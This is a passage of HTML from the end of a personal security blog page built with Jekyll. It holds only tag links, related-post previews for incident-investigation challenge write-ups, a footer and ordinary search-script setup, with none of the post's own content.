class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/phishing/">Phishing</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/elk/">ELK</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/kibana/">Kibana</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a></div></section></div><section id="toc-wrapper" class="d-none ps-0 pe-4"><h2 class="panel-heading ps-3 mb-2">Contents</h2><nav id="toc"></nav></section></aside></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4"><aside id="related-posts" aria-labelledby="related-label"><h3 class="mb-4" id="related-label">Further Reading</h3><nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4"><article class="col"> <a href="/posts/boogeyman-3/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1730934000" data-df="ll" > Nov 7, 2024 </time><h4 class="pt-0 my-2">Boogeyman 3</h4><div class="text-muted"><p>The Boogeyman emerges from the darkness again.</p></div></div></a></article><article class="col"> <a href="/posts/boogyman/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1730588400" data-df="ll" > Nov 3, 2024 </time><h4 class="pt-0 my-2">Boogeyman 1</h4><div class="text-muted"><p>A new threat actor emerges from the wild using the name Boogeyman. Are you afraid of the Boogeyman?</p></div></div></a></article><article class="col"> <a href="/posts/benign/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1730070000" data-df="ll" > Oct 28, 2024 </time><h4 class="pt-0 my-2">Benign</h4><div class="text-muted"><p>Challenge room to investigate a compromised host using Splunk.</p></div></div></a></article></nav></aside><nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation"> <a href="/posts/boogyman/" class="btn btn-outline-primary" aria-label="Older" ><p>Boogeyman 1</p></a> <a href="/posts/boogeyman-3/" class="btn btn-outline-primary" aria-label="Newer" ><p>Boogeyman 3</p></a></nav><footer aria-label="Site Info" class=" d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3 " ><p>© <time>2025</time> <a href="https://github.com/elomarii">Ibrahim El Omari</a>. <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author." >All rights reserved.</span></p><p>Using the <a data-bs-toggle="tooltip" data-bs-placement="top" title="v7.0.1" href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener" >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.</p></footer></div></div><div id="search-result-wrapper" class="d-flex justify-content-center d-none"><div class="col-11 content"><div id="search-hints"><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/dfir/">DFIR</a> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/phishing/">Phishing</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/elk/">ELK</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/kibana/">Kibana</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a></div></section></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><aside aria-label="Scroll to Top"> <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow"> <i class="fas fa-angle-up"></i> </button></aside></div><div id="mask"></div><aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true" data-bs-autohide="false" ><div class="toast-header"> <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close" ></button></div><div class="toast-body text-center pt-0"><p class="px-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></aside><script src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js,npm/tocbot@4.27.20/dist/tocbot.min.js"></script> <script src="/assets/js/dist/post.min.js"></script> <script defer src="/app.min.js"></script> <script>SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<article class="px-1 px-sm-2 px-lg-4 px-xl-0"><header><h2><a href="{url}">{title}</a></h2><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div></header><p>{snippet}</p></article>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
